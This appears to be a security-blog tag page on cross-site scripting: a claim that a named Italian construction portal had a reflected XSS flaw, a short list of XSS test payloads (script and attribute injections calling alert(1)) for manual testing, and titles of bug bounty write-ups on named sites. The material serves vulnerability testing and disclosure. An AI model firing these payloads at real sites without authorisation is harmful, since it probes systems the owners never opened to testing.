I navigated this website: https://www.edilportale.com, an Italian web portal on construction. I found out that it was vulnerable to reflected XSS, as seen in the image.
Tag: xss
Best XSS Vectors
Here’s a small #XSS list for manual testing (main cases, high success rate).
"><img src onerror=alert(1)>
"autofocus onfocus=alert(1)//
</script><script>alert(1)</script>
'-alert(1)-'
\'-alert(1)//
javascript:alert(1)
Try it on:
– URL query, fragment & path;
– all input fields.
From BruteLogic Twitter account: https://twitter.com/brutelogic
XSS in App1.bqrlinq.com (Got bounty and fixed)
Hitachi Incident Response Team (HIRT)
Hitachi HIRT xss reflected
Stored Cross-site Scripting (XSS) vulnerability in Charitybuzz.com
How I was able to discover a Stored XSS vulnerability in Charitybuzz.com – Binit Ghimire
Stored Cross-site Scripting (XSS) vulnerability in 1MB.site
How I discovered a Stored XSS vulnerability in 1MB.site – Binit Ghimire
How I was able to Discover a Stored Cross-site Scripting (XSS) vulnerability in Flaticon
How I was able to Discover a Stored Cross-site Scripting (XSS) vulnerability in Flaticon – Binit Ghimire
Pwnie Express – Cross-site Scripting (XSS)
XSS (Cross Site Scripting) at Motorola
Everything about XSS is in this source!
My name is Ismail Tasdelen. As a security researcher, I created a resource in this article for you to get better information about XSS. There are many XSS bypass payloads in this resource, and there are a lot of technical sources. I hope it will be useful.